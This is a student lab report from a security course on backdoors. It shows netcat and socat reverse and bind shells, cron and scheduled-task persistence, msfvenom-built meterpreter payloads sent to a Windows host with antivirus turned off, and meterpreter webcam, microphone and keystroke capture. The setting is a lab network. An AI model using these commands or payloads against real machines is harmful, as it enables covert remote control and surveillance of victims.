20192209 Exp2-后门原理与实践


1.后门概念

后门就是不经过正常认证流程而访问系统的通道。

哪里有后门呢?

  • 编译器留后门
  • 操作系统留后门
  • 最常见的当然还是应用程序中留后门
  • 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。

下面是近些年的一些例子:

  1. 编译器:苹果Xcode后门事件。苹果Xcode后门事件中招的APP包括:微信、网易云音乐、滴滴出行、12306等76个软件,影响到几亿用户。
  2. 操作系统:政府VS厂商。苹果公开拒绝FBI要求设置后门的要求。那些没拒绝的当然不会说话。
  3. 操作系统:深入解读MS14-068漏洞:微软精心策划的后门?。其实细节我也没太看懂,看出来蛮可疑。
  4. 固件:更多思科路由器发现后门:中国有4台
  5. 应用:研究人员发现macOS版Skype内置了后门
  6. 应用:从广升“后门”事件看企业道德底线
  7. 应用:如何评价乌云漏洞平台曝百度旗下多款App存在WormHole后门?

我们接下来讲得是一个相对狭义一点的后门的概念,

  • 特指潜伏于操作系统中专门做后门的一个程序,
  • “坏人”可以连接这个程序
  • 远程执行各种指令。
  • 概念和木马有重叠


* 首先得有这么一个程序* netcat 系列* meterpreter* intersect * ...特别多
* 其次得放到系统里 * 正版软件故意或被攻击,包含后门* 正版库文件中包含后门* 本质上,需要诱骗你下载操作的,都属于各种钓鱼吧   * 安装包中包含后门,放到网上供下载* 绑定到特定文件中,放到网上供下载* 直接发送恶意程序给你* 直接发送攻击性钓鱼链接给你,恶意网站种马* 捡到个U盘,打开个文件看看?* 煤女帅锅拿U盘直接拷给你* 攻击系统漏洞,获取控制权后,安装后门
* 再次还得运行起来* 开机自启动技术* win的定时任务* linux的cron* 伪装成常用软件,诱使用户点击* 木马化正常软件
* 最后还得不被本机的恶意代码检测程序发现* 恶意代码免杀技术
* 也不能被本机的或网络上的防火墙发现* 反弹式连接* 加密连接* 隧道技术

2. 常用后门工具

  • 2.1 讲怎么用nc获取远程主机的Shell
  • 2.2 讲meterpreter怎么用。

2.1 NC 或 netcat

1.关于netcat

  • 又名nc,ncat
  • http://nc110.sourceforge.net/
  • http://netcat.sourceforge.net/.

是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。

  • Linux: 一般自带netcat,“man netcat” 或"man nc"可查看其使用说明。
  • Windows: 课程主页附件中下载ncat.rar解压即可使用。
  • Mac: 系统自带,“man nc”,查看其使用说明。
  • 以下相关指令,实测有效。

2.1.1 Win获得Linux Shell

以下实践Windows基本Win11, Kali.
首先查看本机以及kali的IP地址

1.windows 打开监听

ncat.exe -l -p 2209

2.Linux反弹连接win

 nc 192.168.1.106 2209 -e /bin/sh

3.windows下获得一个linux shell,可运行任何指令,如ls
此处示例执行了whoami指令,成功返回我于Windows中的用户名

3 在虚拟机中启动cron并在主机监听

先在虚拟机上用crontab -e指令编辑一条定时任务(crontab指令增加一条定时任务,-e表示编辑,输入2表示选择vim编辑器)

此处我已编辑后截的图。

在最后一行添加

40 * * * *  /bin/netcat 192.168.1.106 2209 -e /bin/sh

即在每个小时的第40分钟反向连接Windows主机的2209端口

在40分时打开Windows终端,输入

ncat -l -p 2209

即可成功获取虚拟机的shell,此处示例执行了ls指令

4 使用socat获取主机操作Shell,任务计划启动

现在我们要通过使用socat从kali中获取Windows shell。首先打开Windows中的计算机管理中的任务计划程序。
然后创建任务,名称设置为20192209exp2。

添加一个工作站锁定时的触发器。

新建执行socat.exe程序的操作,并将参数设置为tcp-listen:2209 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口2209,同时把cmd.exe的stderr重定向。

创建任务后,锁屏,再打开,进入kali中监听,socat - tcp:192.168.1.106:2209,成功获取到Windows shell


5 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

首先是生成后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=2209 -f exe > 20192209_backdoor.exe

然后需要将这个程序发送给Windows主机,这就需要目标机开启监听

ncat -lv 2209 >20192209_backdoor.exe

然后再在kali中发送

nc 192.168.1.106 2209 < 20192209_backdoor.exe

在发送前我们要先把windows安全中心中的杀毒功能关闭。发送成功

在kali上使用msfconsole指令进入msf控制台

对msf控制台进行配置
依次输入以下命令

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.15
set LPORT 2209


接着输入exploit进行监听,在Windows在打开20192209_backdoor.exe后并没有成功获取到Windows的shell,在检查杀毒软件之后并未发现后门软件被禁用,却发现虽然kali可以ping通外部主机,但是外部主机却无法ping通kali。在课堂上询问老师后,我修改网络模式为网桥模式,随后使用手机热点,成功ping通后进行实验。由于修改了网络模式和所连接的网络,Windows端查看的IP地址和kali中查看到的IP地址如下。
Windows:192.168.43.152
kali:192.168.43.27

随后重新输入exploit进行监听,成功实现获取Windows的shell

6 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

获取目标主机音频
在之前进入的MSF exploit中输入record_mic指令进行录音(-d可设置时长)
获取目标主机摄像头
输入webcam_snap指令控制摄像头进行拍照
获取击键记录
输入keyscan_start开始捕获键盘记录,keyscan_dump获取击键记录(-d可设置时长)
截取主机屏幕
使用screenshot指令可以进行截屏




7 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

输入的payload如下:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.27 LPORT=2209 -x pwn1 -f elf > 20192209pwn


然后打开msf控制台,配置

再用另一个终端执行生成的文件20192209pwn,再进行监听,成功获取了shell

8 基础问题回答

例举你能想到的一个后门进入到你系统中的可能方式?
在不知名网站上随意下载非官方版本的软件

例举你知道的后门如何启动起来(win及linux)的方式?
Windows

Windows可以通过偷偷新建任务管理计划,使之在进行特定操作时触发后门程序。
Linux则可以通过crontab任务计划定时或以别的条件启动
两者均可通过socat和netcat获取shell、反弹连接。

Meterpreter有哪些给你印象深刻的功能?
Meterpreter可以快速简单地生成一个后门程序,而且功能较为强大,适合类似我们这样的学习用户。

如何发现自己有系统有没有被安装后门?

1.当电脑经常卡顿,经常死机时,可能电脑已被注入后门,电脑的资源被占用
2.部分文件异常无法启动
病毒修改了或删除注入了某些文件。
3.启动黑屏/蓝屏
4.Windows Defender的报告,Windows自带的杀软功能较为强大,能准确识别出一些恶意软件。

实验总结与体会

本次实验是本学期的第二次实验,实验在老师和同学的指引下较为顺利的完成了,期间遇到的许多问题主要为网络的问题。在实验进行到中途时,我发现kali内部可以ping通Windows,而Windows无法ping通kali,一开始尝试了关闭kali内的防火墙,以及切换网卡模式为仅主机host,依旧无法解决。在老师上课时讲述桥接相关知识后,我将网卡模式切换为桥接模式后便可以实现ping通,随后的实验便较为顺利。本次实验使我第一次实现一个十分基础的后门软件的生成和注入,而实验第四项的控制主机摄像头拍照、录视频、获取击键记录给我留下了深刻的印象,也更让我期待后续的实验内容。

20192209 Exp2-后门原理与实践相关推荐

  1. Exp2 后门原理与实践 20164323段钊阳

    220164323 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,. (2)例举你知道的后门如何 ...

  2. 2018-2019 Exp2 后门原理与实践

    2018-2019 Exp2 后门原理与实践 目录 一.实验内容说明及基础问题回答 二.工具准备 查看WindowsIP和LinuxIP Windows获得Linuxshell Linux 获得Win ...

  3. 2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任 ...

  4. 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp2 后门原理与实践

    2019-2020-2 20175227张雪莹<网络对抗技术> Exp2 后门原理与实践 目录 0. 基础知识 1. 实验内容 1.0 常用后门工具 1.1 使用netcat获取主机操作S ...

  5. Exp2 后门原理与实践 20164321 王君陶

    Exp2 后门原理与实践 20164321 王君陶 一.实验内容 基础问题回答: 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:通过漏洞,点击陌生链接,或者浏览不良网页挂马. 2.例举你知 ...

  6. Exp2 后门原理与实践 20204308李文艳

    Exp2 后门原理与实践 20204308李文艳 1. 基础问题 1.1 例举你能想到的一个后门进入到你系统中的可能方式? 1.2 例举你知道的后门如何启动起来(win及linux)的方式? 1.3 ...

  7. 20155317王新玮《网络对抗》Exp2 后门原理与实践

    20155317王新玮<网络对抗>Exp2 后门原理与实践 一.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划 ...

  8. 2017-2018-2 20155314《网络对抗技术》Exp2 后门原理与实践

    2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或net ...

  9. Exp2 后门原理与实践

    Exp2 后门原理与实践 实验环境 攻击机 kali 4.14(64位) (IP: 10.0.2.6/24) 靶机 ubuntu 16.04(32位) (IP: 10.0.2.4/24) window ...

  10. 20194307肖江宇Exp2—后门原理与实践

    文章目录 20194307肖江宇Exp-2后门原理与实践 1.实验基础 1.1基础知识 1.2常用后门工具 NC和Netcat SoCat 任何代理.转发等功能都可以用该工具实现. Meterpret ...

最新文章

  1. asp.net中的联动菜单
  2. 【Java】面向对象编程语法知识点总结
  3. 博客园计划增加的功能
  4. 腾讯优图13篇论文入选ICCV2019,涉及2D图像多视图生成等研究
  5. 多个线程作用于同一个runnable对象
  6. .NET Core 开源项目 Anet 在路上
  7. python input 文件路径_python – 将目录路径作为用户输入的正确方法是什么?
  8. 视频问答PPT大放送丨中信银行邓琼-GoldenDB分布式数据库研发与应用实践
  9. vue 实例的生命周期
  10. Dell T3610 台式工作站UEFI模式安装Win7系统
  11. xftp传输文件报错
  12. 【OpenCV-Python-课程学习(贾)】OpenCV3.3课程学习笔记:图像色彩空间转换(cvtColor),imread()的grayscale和cvtColor()的区别、通道分离与转换
  13. C1见习工程师能力认证 考纲
  14. 不需要下载7-zip 解压 7z.001 7z.002 7z.003
  15. 微信支付--网页版-V3-(2)
  16. LinkedList面试要点总结
  17. Win 10 远程桌面连接
  18. Python:实现费马检测算法(附完整源码)
  19. rails3 新特性 和 RJS评论
  20. react-ant design mobile - webpack 自定义主题

热门文章

  1. 深入linux设备驱动程序内核机制(第三章) 读书笔记
  2. Unity2D游戏制作常用方法
  3. 物联网应用案例,中易云真实搭建项目
  4. 对短信验证码发送次数的限制
  5. 驰骋工作流签订中国航天,广东航宇卫星
  6. 《深度学习:走向核心素养》学习体会
  7. 友情链接模块phpcms
  8. html中图片左右切换,超简单的图片左右切换滑动
  9. qq号被盗是什么原理_手机被盗之前(和之后)应该做什么
  10. uni.navigateTo失效